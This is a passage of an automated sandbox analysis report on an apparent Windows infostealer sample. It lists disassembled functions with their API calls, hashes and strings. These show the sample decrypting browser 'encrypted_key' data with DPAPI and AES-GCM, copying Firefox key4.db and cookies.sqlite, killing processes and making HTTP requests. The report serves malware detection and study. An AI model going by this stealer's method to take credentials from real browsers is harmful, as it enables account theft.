                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$Http$CloseHandleOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                                                                                                                                      • String ID: ERROR$GET$HTTP/1.1$https
                                                                                                                                                                                                                                                                                      • API String ID: 1693188093-2961588264
                                                                                                                                                                                                                                                                                      • Opcode ID: 2e2f3eead9419f441d624b4b2d1e8f2e1cd83a2dda5262dd01751a01b6ddd133
                                                                                                                                                                                                                                                                                      • Instruction ID: 3507938dcee9cc1a0527973a4bd5b6eba6c84462808e0f35a45f5f60c0c7131e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e2f3eead9419f441d624b4b2d1e8f2e1cd83a2dda5262dd01751a01b6ddd133
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D451D771A00319ABDB10DFA4DC85FFF7779AF84704F00452AFA05A7281DB78A985CBA5
                                                                                                                                                                                                                                                                                      Function 004078F0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 264memorystringencryptionCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                        • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,00000000,?,?,?,00000000), ref: 0040794C
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,-00000010,0041FE20,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040796B
                                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00407999
                                                                                                                                                                                                                                                                                      • CryptUnprotectData.CRYPT32 ref: 00407AFA
                                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00407B13
                                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00407B39
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00407BC2
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Local$Alloc$File$Freelstrlen$CloseCreateCryptDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                                                                                                                      • String ID: "encrypted_key":"$AES$ChainingMode$ChainingModeGCM$DPAP$_key.txt
                                                                                                                                                                                                                                                                                      • API String ID: 72760943-530840575
                                                                                                                                                                                                                                                                                      • Opcode ID: 80c8c99dc66d1a3a314694ca8b656682875a6de58e5a181b00e7ea29ddd83769
                                                                                                                                                                                                                                                                                      • Instruction ID: 10bc9677902d6ee6c816a36e6349628b10f5ac32de00f2ba7c41a4f543123621
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80c8c99dc66d1a3a314694ca8b656682875a6de58e5a181b00e7ea29ddd83769
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93A1C571E042159BDB10DFA1CC85BAE7BB5FF44304F10452AE901BB291D778BA45CBA6
                                                                                                                                                                                                                                                                                      Function 00409460 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 341filestringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,?,?,0042119A,?,?,0042150A), ref: 004094C5
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004095D2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00409766
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Filelstrcpy$Locallstrcatlstrlen$AllocCloseCopyCreateFindFirstFreeHandleReadSizeSystemTimestrlen
                                                                                                                                                                                                                                                                                      • String ID: C:\ProgramData\$\key4.db$cookies.sqlite
                                                                                                                                                                                                                                                                                      • API String ID: 621517324-1530792146
                                                                                                                                                                                                                                                                                      • Opcode ID: efc8b8d459f8125ef32f95508c9d4e357bcd32b5b3231743abb90690a61e27b0
                                                                                                                                                                                                                                                                                      • Instruction ID: 855358d25c22b69566fbc42c17e74533ab55524d0b71b666bfbe4b79f85c7bd2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efc8b8d459f8125ef32f95508c9d4e357bcd32b5b3231743abb90690a61e27b0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CC1B631A102189BCF14EBB1CC95AEE7779AF44304F44005EF80667292DB7C6EC5CBA9
                                                                                                                                                                                                                                                                                      Function 00411FA0 Relevance: 13.6, APIs: 9, Instructions: 59processCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411FB6
                                                                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 00411FC4
                                                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00411FD0
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00411FF1
                                                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00411FFE
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,?), ref: 0041200A
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041201E
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041202D
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00412036
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3836391474-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 73d56ab98b17da3653dff67e089b2de93a438a2d9c22f275f8cd819916ddfa29
                                                                                                                                                                                                                                                                                      • Instruction ID: 924cd2998aa8e6582c44da8d0305fac9719003efd41fa9ed3311d7015259d757
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73d56ab98b17da3653dff67e089b2de93a438a2d9c22f275f8cd819916ddfa29
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B115231104305AFD3201F61BD0CFAFBAADEBC9785F04501DFA45D62A0DF79A851CAA9
                                                                                                                                                                                                                                                                                      Function 004109F0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000,0042150A), ref: 00410A11
                                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410A23
                                                                                                                                                                                                                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410A2D
                                                                                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00410A4D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000,00000200,?,?,?), ref: 00410AB4
                                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00410B18
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$InfoKeyboardLayoutListLocalLocale$AllocFreelstrcatlstrlenmemset
                                                                                                                                                                                                                                                                                      • String ID: /
                                                                                                                                                                                                                                                                                      • API String ID: 2580590304-4001269591
                                                                                                                                                                                                                                                                                      • Opcode ID: 47d8d58765390bafa4d4b739f7cf5a28c409f74912168362484b764a7be3d9a5
                                                                                                                                                                                                                                                                                      • Instruction ID: eea5c3a77f3b4bcccf0633d63ef4e7b0d3230a8af430361ee2a26d3609cb3d8b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47d8d58765390bafa4d4b739f7cf5a28c409f74912168362484b764a7be3d9a5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5831A8313043186BD7106B919C89FAF779DEB85748F00051EF9469B291DABCAD8487A9
                                                                                                                                                                                                                                                                                      Function 00412050 Relevance: 12.1, APIs: 8, Instructions: 54processCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 00412065
                                                                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00412071
                                                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 0041207D
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 00412091
                                                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 00412099
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120B6
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120C5
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120CE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
